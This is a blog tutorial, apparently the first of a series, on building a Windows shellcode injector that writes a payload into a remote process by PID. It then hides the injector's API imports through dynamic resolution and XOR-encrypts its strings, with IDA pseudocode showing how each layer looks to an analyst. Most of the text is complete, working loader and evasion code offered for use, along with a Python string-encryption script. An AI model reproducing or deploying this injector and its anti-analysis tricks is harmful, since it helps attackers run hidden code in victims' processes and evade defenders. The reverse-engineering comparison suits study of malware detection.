Malware Development and Reverse Engineering Analysis Part 1

Shellcode Remote Process Injection, API Obfuscation, and API XOR String Encryption

This writeup is part of a series where I plan to share what I’ve learned about malware development and red team tooling development. Each writeup will offer a guide and in-depth technical insights into the malware or program I’m working on. Along with that, I’ll include a simple reverse engineering analysis to show how it looks like in a disassembler. The goal is to sharpen my skills in both malware development and malware analysis/reverse engineering through this process.

This post will first show the steps in writing a simple malware program to inject shellcode into a remote target process by suppling the PID. In addition, it will then go over how we can hide suspicious Windows API calls from the Import Address Table (IAT) to avoid basic analysis, and last the writeup will go over how to XOR encrypt certain strings and how it obfuscates what the program does in basic static analysis.

All project files (code and scripts) can be found here: https://github.com/0xEct0/Maldev-Re-1

NOTE: The following snippets of code throughout this writeup have a lot of Windows APIs. I will not go in depth on what each argument/return value is, so please refer to the API’s respective Microsoft documentation page for more detailed technical information.

Writing a Simple Shellcode Injection Program - no-obfuscation.c

The overarching program no-obfuscation.c execution flow at a high level:

  1. Accept via arguments PID of target process
  2. Validate there’s a running process that matches the PID supplied
  3. Open handle to target process
  4. Allocate memory in target process
  5. Write shellcode in the allocated memory within the target process
  6. Change permissions to have the region of memory executable
  7. Execute the shellcode in the region of allocated memory

The first step is pretty straight forward, we’ll get the second argument (first argument is the program name) and convert it to a integer:

int main( int argc, char *argv[] )
{
    if( argc < 2 )
    {
        return;
    }
    
    DWORD process_id = atoi( argv[1] );
}

Now to validate that there’s a running process with that PID, we’ll use the following Windows APIs:

  • CreateToolhelp32Snapshot - Gets a snapshot of all running processes
  • Proess32First - Gets information of the first process in the snapshot from CreateToolhelp32Snapshot
  • Process32Next - Gets information of the next process in the snapshot from CreateToolhelp32Snapshot
  • OpenProcess - Once PID is verified, this API will get a handle to the process

Each process in the snapshot is of struct PROCESSENTRY32, from Microsoft docs:

typedef struct tagPROCESSENTRY32 {
  DWORD     dwSize;
  DWORD     cntUsage;
  DWORD     th32ProcessID;
  ULONG_PTR th32DefaultHeapID;
  DWORD     th32ModuleID;
  DWORD     cntThreads;
  DWORD     th32ParentProcessID;
  LONG      pcPriClassBase;
  DWORD     dwFlags;
  CHAR      szExeFile[MAX_PATH];
} PROCESSENTRY32;

The field we’re interested in is the th32ProcessID which holds the PID of the process.

To enumerate through the running processes, we first do CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 ) , TH32CS_SNAPPROCESS means we will get all running processes on the system. And the next argument doesn’t really matter as per Microsoft docs on this API says, “The process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process. This parameter is used when the TH32CS_SNAPHEAPLIST, TH32CS_SNAPMODULE, TH32CS_SNAPMODULE32, or TH32CS_SNAPALL value is specified. Otherwise, it is ignored and all processes are included in the snapshot.”

Once a snapshot has been successfully created, we’ll look into the first process using Process32First and enter a do while loop to check the process ID. If it does not match what was supplied into the program it’ll go to the next process in the snapshot using Process32Next. If the process ID matches, the program will obtain a handle to the target using the OpenProcess API and break the do while loop. Below is the code for that

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    
    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    process_snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( NULL == process_snapshot )
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    Process32First( process_snapshot, &current_process );

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            target_process = OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        // printf( "[!] Could not find target or OpenProcess() failed!\n" );
        return 1;
    }

Once the PID has been validated with a running process and a handle to the process has been obtained, the next step is to allocate memory in the target process using the VirtualAllocEx API. We’ll be allocating enough memory by whatever the size of the payload is, and we’ll assign it with read and privileges, we’ll later modify this region of memory to allow it to execute in the later step. The API returns a pointer to where the memory was allocated in the process. Read the Microsoft docs for specific information about this function. Below is the code for allocating memory in the target process.

    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    target_process_allocated_memory = VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

The next step is to inject our payload into the target memory process to where we allocated the memory in the previous step:

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    return_check = WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

Next is to update the allocated region in memory where we injected the payload to allow execution using the VirtualProtectEx Windows API. We’ll be updating it with memory constraints of PAGE_EXECUTE_READWRITE . Note that for this API you need to use the old_protect field, from the API docs: “[out] lpflOldProtect - A pointer to a variable that receives the previous access protection of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.” Below is the code for it.

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = NULL;
    return_check = VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

Last, we’ll execute the shellcode that was injected by using the CreateRemoteThread WinAPI:

    //
    // EXECUTED SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    handle_remote_thread = CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }

    // printf( "[+] Executed payload!\n" );
    return 0;

Compilation was done using Microsoft Visual Studio cl.exe compiler: cl.exe no-obfuscation.c /Fe:no-obfuscation.exe

Static Analysis of no-obfuscation.exe

For the reverse engineering analysis, I will be using IDA freeware. To start off, we can look at the Import Address Table (IAT). From this Microsoft dev blog (https://devblogs.microsoft.com/oldnewthing/20221006-07/?p=107257#:~:text=The import address table is the part of the Windows,functions imported from other DLLs), this is how the IAT is described as:

The import address table is the part of the Windows module (executable or dynamic link library) which records the addresses of functions imported from other DLLs. For example, if your program calls Get­System­Info(), then the executable or DLL will have an entry in its import table that says, “I would like to be able to call the function Get­System­Info() from kernel32.dll.” When the module is loaded, the system goes and finds that function, obtains its address, and stores it in a table known as the Import Address Table (IAT).

Essentially, we can look at the IAT to see which APIs is imported and used within the executable. This can give us an idea of what the executable will do. In IDA freeware, the IAT can be viewed under View > Open subviews > Imports .

image.png

Right away, we can see some suspicious Windows APIs that are used which should be familiar to us. Grouping by functionality, the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs are used to enumerate through the running processes on the system while the OpenProcess, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, and CreateRemoteThread are used for process injection/memory injection techniques.

In addition, we can have IDA generate pseudocode to make analysis easier by doing View > Open subviews > Generate pseudocode. Here is the resulting pseudocode:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HANDLE hProcess; // [rsp+48h] [rbp-180h]
  void *lpBaseAddress; // [rsp+50h] [rbp-178h]
  HANDLE hSnapshot; // [rsp+58h] [rbp-170h]
  int v7; // [rsp+60h] [rbp-168h]
  DWORD flOldProtect; // [rsp+64h] [rbp-164h] BYREF
  SIZE_T dwSize; // [rsp+68h] [rbp-160h]
  __int64 v10; // [rsp+70h] [rbp-158h]
  PROCESSENTRY32 pe; // [rsp+80h] [rbp-148h] BYREF

  if ( argc < 2 )
    return 0;
  hProcess = 0LL;
  v7 = unknown_libname_19(argv[1], argv, envp);
  hSnapshot = CreateToolhelp32Snapshot(2u, 0);
  if ( !hSnapshot )
    return 1;
  pe.dwSize = 304;
  Process32First(hSnapshot, &pe);
  while ( v7 != pe.th32ProcessID )
  {
    if ( !Process32Next(hSnapshot, &pe) )
      goto LABEL_8;
  }
  hProcess = OpenProcess(0x1FFFFFu, 1, pe.th32ProcessID);
LABEL_8:
  CloseHandle(hSnapshot);
  if ( !hProcess )
    return 1;
  dwSize = 3072LL;
  lpBaseAddress = VirtualAllocEx(hProcess, 0LL, 0xC00uLL, 0x3000u, 4u);
  if ( !lpBaseAddress )
    return 1;
  if ( !WriteProcessMemory(hProcess, lpBaseAddress, &unk_14001C000, dwSize, 0LL) )
    return 1;
  flOldProtect = 0;
  if ( !VirtualProtectEx(hProcess, lpBaseAddress, dwSize, 0x40u, &flOldProtect) )
    return 1;
  v10 = 0LL;
  return CreateRemoteThread(hProcess, 0LL, 0LL, (LPTHREAD_START_ROUTINE)lpBaseAddress, 0LL, 0, 0LL) == 0LL;
}

Here we can see IDA was pretty close to the source code, where we first check to ensure the user supplied an argument (a PID), then it enumerates through the processes using the aforementioned Windows APIs, gets a handle to the process using OpenProcess, then uses several Windows APIs to inject the shellcode into the target process.

As shown, identifying which Windows APIs were used in this program was very straightforward, either looking at the IAT or the generated pseudocode from IDA allowed us to easily identify what APIs were used, and thus easily identify what the program is meant to do.

Obfuscating Windows APIs - obfuscated-apis.c

To provide a simple layer of obfuscation, we can utilize two APIs to dynamically load and call other Windows APIs: LoadLibraryA and GetProcAddress. The first obtains a handle to a DLL while the later gets the address of a function within a DLL. Using these two functions, we can declare a function pointer that matches the same signature of a specific WinAPI function that we want to utilize, and then assign the function pointer to the address of that WinAPI to later use. Consider the example below using MessageBoxA:

    char string1[] = "Hello, World!";
    char string2[] = "Test MessageBox()";
    
    MessageBoxA(NULL, string1, string2, MB_OK );

    return 0;

Looking at the IAT, you can see the MessageBoxA API be used. However, the code snippet below shows how we can dynamically load and call the same API:

    char string1[] = "Hello, World!";
    char string2[] = "Test MessageBox()";

    HMODULE user32_handle = LoadLibraryA( "USER32.DLL" );
    
    if( NULL == user32_handle )
    {
        DWORD dwError = GetLastError();
        return 1;
    }

    int (WINAPI * _MessageBox)
    (
        HWND    hWnd,
        LPCTSTR lpText,
        LPCTSTR lpCaption,
        UINT    uType    
    );

    _MessageBox = ( int (WINAPI *)
    (
        HWND    hWnd,
        LPCTSTR lpText,
        LPCTSTR lpCaption,
        UINT    uType    
    )) GetProcAddress( user32_handle, "MessageBoxA");
    
    if( NULL == _MessageBox)
    {
        printf( "Could not initialize _MessageBox!\n" );
        return 1;
    }

    _MessageBox(NULL, string1, string2, MB_OK );

    return 0;

We first load the DLL using LoadLibraryA, and in this instance we load user32.dll since that’s where the API we’re looking to leverage resides. We then check to ensure it was loaded properly then define a function pointer with the same signatures as MessageBoxA and name this function _MessageBox. Then we set the pointer to the address of the MessageBoxA function using GetProcAddress. And last we check to ensure the function has been dynamically resolved correctly so that it is ready to be used. Looking at the IAT of the resulting exe in IDA, the IAT does not list MesageBoxA. We can apply this same methodology in the original code for process injection.

For the process injection code, we’ll hide the main API functions that pretty much give away what the code does:

  • CreateToolhelp32Snapshot
  • Process32First
  • Process32Next
  • VirtualAllocEx
  • VirtualProtectEx
  • OpenProcess
  • WriteProcessMemory
  • CreateRemoteThread

All of these functions are from kernel32.dll so we’ll just have to obtain the address of one module by doing the following:

    HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
    
    if( NULL == kernel32_dll_handle )
    {
        return 1;
    }

Now with a handle to the kernel32 module, we can dynamically resolve our own WinAPI functions that match the signature of WinAPI functions to use using the API GetProcAddress. The following example is resolving the CreateToolhelp32Snapshot:

    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );

Then to use _CreateToolhelp32snapshot, we use it exactly like how we use the original API:

    // check to ensure it's been resolved
    if( NULL == _CreateToolhelp32Snapshot )
    {
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

Another example with VirtualAllocEx:

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

We can repeat this process of resolving API’s to hide them from the IAT. Here is the final code for this version:

#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"

int main( int argc, char* argv[] )
{
    if( argc < 2 )
    {
        return 1;
    }

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    DWORD process_id = atoi( argv[1] );

    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
    
    if( NULL == kernel32_dll_handle )
    {
        // printf( "Could not load kernel32.dll!\n" );
        return 1;
    }
    
    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );

    if( NULL == _CreateToolhelp32Snapshot )
    {
        // printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( NULL == process_snapshot )
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    
    BOOL( WINAPI * _Process32First)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe   
    );

    _Process32First = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe     
    )) GetProcAddress( kernel32_dll_handle, "Process32First" );

    if( NULL == _Process32First )
    {
        // printf( "Could not resolve Process32First!\n" );
        return 1;
    }
    
    _Process32First( process_snapshot, &current_process );

    BOOL( WINAPI * _Process32Next)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe 
    );

    _Process32Next = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe    
    )) GetProcAddress( kernel32_dll_handle, "Process32Next" );

    if( NULL == _Process32Next )
    {
        // printf( "Could not resolve Process32Next!\n" );
        return 1;
    }

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            HANDLE( WINAPI * _OpenProcess )
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId            
            );

            _OpenProcess = ( HANDLE (WINAPI *)
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId             
            )) GetProcAddress( kernel32_dll_handle, "OpenProcess" );

            if( NULL == _OpenProcess )
            {
                // printf( "Could not resolve OpenProcess!\n" );
                return 1;
            }

            target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( _Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        return 1;
    }

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

    // printf( "[+] Successfully allocated memory!\n" );

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    BOOL( WINAPI * _WriteProcessMemory )
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten    
    );

    _WriteProcessMemory = ( BOOL(WINAPI *)
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten     
    )) GetProcAddress( kernel32_dll_handle, "WriteProcessMemory" );

    if( NULL == _WriteProcessMemory )
    {
        // printf( "Could not resolve WriteProcessMemory!\n" );
        return 1;
    }

    return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = NULL;

    BOOL( WINAPI * _VirtualProtectEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
    );

    _VirtualProtectEx = ( BOOL(WINAPI *)
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect   
    )) GetProcAddress( kernel32_dll_handle, "VirtualProtectEx" );

    if( NULL == _VirtualProtectEx )
    {
        // printf( "Could not resolve VirtualProtectEx!\n" );
        return 0;
    }

    return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

    //
    // EXECUTED SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    HANDLE( WINAPI * _CreateRemoteThread )
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId   
    );

    _CreateRemoteThread = ( HANDLE(WINAPI *)
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId    
    )) GetProcAddress( kernel32_dll_handle, "CreateRemoteThread" );

    if( NULL == _CreateRemoteThread )
    {
        // printf( "Could not resolve CreateRemoteThread!\n" );
        return 1;
    }

    handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }    

    return 0;
}

Static Analysis of obfuscated-apis.exe

Opening this version of the process injection executable and looking into the IAT, the APIs that we have dynamically resolved are removed.

image.png

Though with that, we can see the two new APIs that were used to hide them, GetProcAddress and LoadLibraryA. We could do further work and hide these two APIs by walking the PEB and calculating the absolute address for these functions but that is not in the scope of this article. This process is outlined in the shellcoding a reverse shell writeup in C post on my blog.

Furthermore, the pseudocode that’s generated by IDA looks similar where we can see the allocation/resolving of WinAPI functions and calling them:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE hModule; // [rsp+48h] [rbp-1C0h]
  __int64 v5; // [rsp+50h] [rbp-1B8h]
  __int64 v6; // [rsp+58h] [rbp-1B0h]
  HANDLE hObject; // [rsp+60h] [rbp-1A8h]
  int v8; // [rsp+68h] [rbp-1A0h]
  int v9; // [rsp+6Ch] [rbp-19Ch] BYREF
  __int64 v10; // [rsp+70h] [rbp-198h]
  HANDLE (__stdcall *CreateToolhelp32Snapshot)(DWORD, DWORD); // [rsp+78h] [rbp-190h]
  BOOL (__stdcall *Process32First)(HANDLE, LPPROCESSENTRY32); // [rsp+80h] [rbp-188h]
  HANDLE (__stdcall *OpenProcess)(DWORD, BOOL, DWORD); // [rsp+88h] [rbp-180h]
  BOOL (__stdcall *Process32Next)(HANDLE, LPPROCESSENTRY32); // [rsp+90h] [rbp-178h]
  LPVOID (__stdcall *VirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD); // [rsp+98h] [rbp-170h]
  BOOL (__stdcall *WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *); // [rsp+A0h] [rbp-168h]
  BOOL (__stdcall *VirtualProtectEx)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD); // [rsp+A8h] [rbp-160h]
  HANDLE (__stdcall *CreateRemoteThread)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // [rsp+B0h] [rbp-158h]
  __int64 v19; // [rsp+B8h] [rbp-150h]
  int v20; // [rsp+C0h] [rbp-148h] BYREF
  unsigned int v21; // [rsp+C8h] [rbp-140h]

  if ( argc < 2 )
    return 1;
  v5 = 0LL;
  v8 = unknown_libname_19(argv[1], argv, envp);
  hModule = LoadLibraryA(LibFileName);
  if ( !hModule )
    return 1;
  CreateToolhelp32Snapshot = (HANDLE (__stdcall *)(DWORD, DWORD))GetProcAddress(hModule, ProcName);
  if ( !CreateToolhelp32Snapshot )
    return 1;
  hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))CreateToolhelp32Snapshot)(2LL, 0LL);
  if ( !hObject )
    return 1;
  v20 = 304;
  Process32First = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32first);
  if ( !Process32First )
    return 1;
  ((void (__fastcall *)(HANDLE, int *))Process32First)(hObject, &v20);
  Process32Next = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32next);
  if ( !Process32Next )
    return 1;
  while ( v8 != v21 )
  {
    if ( !((unsigned int (__fastcall *)(HANDLE, int *))Process32Next)(hObject, &v20) )
      goto LABEL_18;
  }
  OpenProcess = (HANDLE (__stdcall *)(DWORD, BOOL, DWORD))GetProcAddress(hModule, aOpenprocess);
  if ( !OpenProcess )
    return 1;
  v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))OpenProcess)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
  CloseHandle(hObject);
  if ( !v5 )
    return 1;
  v10 = 3072LL;
  VirtualAllocEx = (LPVOID (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hModule, aVirtualallocex);
  if ( !VirtualAllocEx )
    return 1;
  v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))VirtualAllocEx)(v5, 0LL, v10, 12288LL, 4);
  if ( !v6 )
    return 1;
  WriteProcessMemory = (BOOL (__stdcall *)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *))GetProcAddress(
                                                                                        hModule,
                                                                                        aWriteprocessme);
  if ( !WriteProcessMemory )
    return 1;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))WriteProcessMemory)(
          v5,
          v6,
          &unk_14001C000,
          v10,
          0LL) )
    return 1;
  v9 = 0;
  VirtualProtectEx = (BOOL (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(hModule, aVirtualprotect);
  if ( !VirtualProtectEx )
    return 0;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))VirtualProtectEx)(
          v5,
          v6,
          v10,
          64LL,
          &v9) )
    return 1;
  v19 = 0LL;
  CreateRemoteThread = (HANDLE (__stdcall *)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(hModule, aCreateremoteth);
  if ( !CreateRemoteThread )
    return 1;
  v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))CreateRemoteThread)(
          v5,
          0LL,
          0LL,
          v6,
          0LL,
          0,
          0LL);
  return v19 == 0;
}

In general, by looking through the pseudocode you can still infer what the executable is doing, namely because IDA is able to identify what API functions are being used by resolving them.

Encrypting the WinAPI Strings - encrypted-apis.c

To further apply anti-analysis techniques to the process injection program, we’ll be XOR encrypting suspicious strings such as any modules we load as well as the APIs we are resolving using GetProcAddress. To encrypt strings, I used the following python3 program which will take all strings in a file xor-list.txt, generate a random one byte key, XOR encrypt all the strings in the text file, and output the resulting XOR encrypted string bytes in a C format:

import random

def generate_xor_key():
    return random.getrandbits( 8 )

def xor_encrypt( data, key ):
    data += b'\0' 
    return bytes( [b ^ key for b in data] )

def format_variable_name( name ):
    if '.' in name:
        name = name.replace( '.', '_' )
    return name + '_encrypted'

def main():
    key = generate_xor_key()

    with open( 'xor-list.txt', 'r' ) as file:
        api_names = file.readlines()

    for api_name in api_names:
        api_name = api_name.strip()  
        api_name_bytes = api_name.encode()

        encrypted_api_name = xor_encrypt( api_name_bytes, key )
        c_formatted_encrypted = ', '.join( f'0x{b:02x}' for b in encrypted_api_name )
        c_formatted_key = f'0x{key:02x}'

        variable_name = format_variable_name( api_name )
        
        print( f"unsigned char {variable_name}[] = };\n" )

    print( f"unsigned char key = {c_formatted_key};" ) 

if __name__ == '__main__':
    main()

Example output:

unsigned char user32_dll_encrypted[] = {0xac, 0xaa, 0xbc, 0xab, 0xea, 0xeb, 0xf7, 0xbd, 0xb5, 0xb5, 0xd9};

unsigned char MessageBoxA_encrypted[] = {0x94, 0xbc, 0xaa, 0xaa, 0xb8, 0xbe, 0xbc, 0x9b, 0xb6, 0xa1, 0x98, 0xd9};

unsigned char key = 0xd9;

The following C XOR decryption function is used. It essentially XOR decrypts in memory given the encrypted byte string and the length:

void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x70;

	for( int i = 0; i < data_len; i++ )
	{
		data[i] ^= key;
	}
}

Putting it together in a simple example, we can XOR encrypt the user32.dll string and the MessageBoxA string, and before we use those strings we decrypt it in memory:

#include <stdio.h>
#include <string.h>
#include <windows.h>

//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x70;

	for( int i = 0; i < data_len; i++ )
	{
		data[i] ^= key;
	}
}

int main() 
{
    unsigned char user32_dll_encrypted[] = {0x05, 0x03, 0x15, 0x02, 0x43, 0x42, 0x5e, 0x14, 0x1c, 0x1c, 0x70};
    unsigned char MessageBoxA_encrypted[] = {0x3d, 0x15, 0x03, 0x03, 0x11, 0x17, 0x15, 0x32, 0x1f, 0x08, 0x31, 0x70};

    xor_decrypt( user32_dll_encrypted, sizeof(user32_dll_encrypted) );
    
    HMODULE user32_handle = LoadLibraryA( user32_dll_encrypted );
    
    if( NULL == user32_handle )
    {
        DWORD dwError = GetLastError();
        return 1;
    }

    int( WINAPI * _MessageBox )
    (
        HWND    hWnd,
        LPCTSTR lpText,
        LPCTSTR lpCaption,
        UINT    uType    
    );

    xor_decrypt( MessageBoxA_encrypted, sizeof(MessageBoxA_encrypted) );

    _MessageBox = ( int (WINAPI *)
    (
        HWND    hWnd,
        LPCTSTR lpText,
        LPCTSTR lpCaption,
        UINT    uType    
    )) GetProcAddress( user32_handle, MessageBoxA_encrypted );
    
    if( NULL == _MessageBox )
    {
        // printf( "Could not initialize _MessageBox!\n" );
        return 1;
    }

    _MessageBox( NULL, "wowowow!", "boo!", MB_OK );

    return 0;
}

After compiling and opening it in IDA, we no longer see the user32.dll and MessageBoxA strings, and in addition, the pseudocode it generates is not able to tell what function is being called from resolving it. The above program’s message box call in IDA’s pseudocode looks like:

((void (__fastcall *)(_QWORD, char *, char *, _QWORD))ProcAddress)(0LL, aWowooww, aBoo, 0LL);

Compared to the previous section’s program where IDA was able to tell what program was being called from resolving it, this program is more obfuscated. We can apply this same logic and obfuscate the rest of the strings such as kernel32.dll and the rest of the APIs. Below is the list xor-list.txt of strings I want to encrypt.

kernel32.dll
user32.dll
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
VirtualAllocEx
WriteProcessMemory
VirtualProtectEx
CreateRemoteThread

An example of applying the XOR encrypted string in the program with the VirtualAllocEx API is shown below where before we resolve the API, we define it’s string in a byte array format (VirtualAllocEx_encrypted) and decrypt it in place. Then we use the string byte array in the GetProcAddress call.

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
